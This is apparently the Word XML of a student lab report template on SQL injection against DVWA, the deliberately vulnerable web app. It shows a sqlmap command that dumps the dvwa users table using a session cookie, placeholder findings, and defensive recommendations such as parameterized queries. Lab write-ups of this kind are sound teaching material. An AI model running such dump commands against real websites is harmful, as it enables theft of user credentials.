    <w:p w14:paraId="7D763A96" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=&lt;session_id&gt;" -D dvwa -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC643A6" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="4A1E1B42" w14:textId="75D822F2" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000898A9" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="64D52B2A" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>Summarize the findings, including the types of data extracted and the severity of the vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E5C4B2" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="69B7D15B" w14:textId="22EB8869" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE77117" w14:textId="4EB71415" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>- Vulnerable Parameter: `id` in `http://localhost/DVWA/vulnerabilities/sqli/?id=`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA61D1" w14:textId="33484465" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>- Data Extracted: Usernames, passwords, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B735F7" w14:textId="76B9D45F" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>-Severit: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699E108E" w14:textId="77777777" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FEE10E4" w14:textId="5274A8DC" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0AFDF5" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="0FBD4EB0" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>Provide recommendations for securing the website against SQL Injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C806FA1" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="16476E73" w14:textId="6BCA296F" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t xml:space="preserve"> Example Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D64E81A" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>- Implement prepared statements and parameterized queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3328FB5F" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>- Use stored procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464041C1" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>- Validate and sanitize all user inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A276594" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- Employ a web application firewall (WAF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447097C9" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>- Regularly update and patch the web application and database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7A4216" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="60CBC176" w14:textId="740FCEB7" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r w:rsidRPr="004F3519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125CF392" w14:textId="77777777" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="35415F4C" w14:textId="25964EE2" w:rsidR="0030185A" w:rsidRDefault="004F3519" w:rsidP="004F3519">
      <w:r>
        <w:t>Conclude the report by summarizing the importance of securing web applications against SQL Injection attacks and the steps taken to identify and exploit the vulnerabilities in DVWA</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234F9FE4" w14:textId="40B5B77C" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="164CD8BB" w14:textId="1F520CD6" w:rsidR="004F3519" w:rsidRDefault="00CA49C8" w:rsidP="004F3519">
      <w:r>
        <w:t>--------------------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B450E24" w14:textId="533C6699" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="4F38EE99" w14:textId="56263674" w:rsidR="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F3519"/>
    <w:p w14:paraId="1303D5F0" w14:textId="15330AD8" w:rsidR="004F3519" w:rsidRPr="004F3519" w:rsidRDefault="004F3519" w:rsidP="004F351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33ABDA" w14:textId="235090E4" w:rsidR="004F3519" w:rsidRPr="00CA49C8" w:rsidRDefault="004F3519" w:rsidP="004F35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9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by,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D32F33" w14:textId="130952BE" w:rsidR="004F3519" w:rsidRPr="00CA49C8" w:rsidRDefault="004F3519" w:rsidP="004F35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9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KEERTHI VARDHAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5A14CA" w14:textId="59404E51" w:rsidR="004F3519" w:rsidRPr="00CA49C8" w:rsidRDefault="004F3519" w:rsidP="004F35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9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APOLLO UNIVERSITY</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004F3519" w:rsidRPr="00CA49C8" w:rsidSect="00911A4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A12C" w14:textId="77777777" w:rsidR="00240357" w:rsidRDefault="00240357" w:rsidP="00CA49C8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="306481CD" w14:textId="77777777" w:rsidR="00240357" w:rsidRDefault="00240357" w:rsidP="00CA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4A7F" w14:textId="77777777" w:rsidR="00CA49C8" w:rsidRDefault="00CA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0CCAA" w14:textId="77777777" w:rsidR="00CA49C8" w:rsidRDefault="00CA49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B1AF" w14:textId="77777777" w:rsidR="00CA49C8" w:rsidRDefault="00CA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7F0C" w14:textId="77777777" w:rsidR="00240357" w:rsidRDefault="00240357" w:rsidP="00CA49C8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6528A5AC" w14:textId="77777777" w:rsidR="00240357" w:rsidRDefault="00240357" w:rsidP="00CA4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7CB3" w14:textId="77777777" w:rsidR="00CA49C8" w:rsidRDefault="00CA4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488327"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Watermarks"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="5F1A0540" w14:textId="5D1928CB" w:rsidR="00CA49C8" w:rsidRDefault="00CA49C8">
        <w:pPr>
          <w:pStyle w:val="Header"/>
        </w:pPr>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:pict w14:anchorId="390A48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39377" o:spid="_x0000_s2049" type="#_x0000_t136" style="position:absolute;margin-left:0;margin-top:0;width:535.75pt;height:100.45pt;rotation:315;z-index:-251657216;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="silver" stroked="f">
              <v:fill opacity=".5"/>
              <v:textpath style="font-family:&quot;Calibri&quot;;font-size:1pt" string="M KEERTHI VARDH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D7F2B" w14:textId="77777777" w:rsidR="00CA49C8" w:rsidRDefault="00CA4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19"/>
    <w:rsid w:val="00240357"/>
    <w:rsid w:val="0030185A"/>
    <w:rsid w:val="004F3519"/>
    <w:rsid w:val="00911A42"/>
    <w:rsid w:val="00CA49C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D2E012"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6CA473E1-6E73-4148-9771-494F5111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9C8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00CA49C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A49C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A49C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A49C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A49C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A49C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A49C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A49C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A49C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C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A49C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A49C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A49C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A49C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A49C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A49C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A49C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A49C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A49C8"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00CA49C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A49C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A49C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A49C8"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00CA49C8"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00CA49C8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="70AD47" w:themeColor="accent6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00CA49C8"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00CA49C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A49C8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00CA49C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A49C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A49C8"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00CA49C8"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleReference">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="00CA49C8"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00CA49C8"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="70AD47" w:themeColor="accent6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="00CA49C8"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps w:val="0"/>
      <w:smallCaps/>
      <w:spacing w:val="7"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00CA49C8"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA4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9C8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA4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keerthivardhanm@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>keerthivardhanm@gmail.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-17T09:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-17T09:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>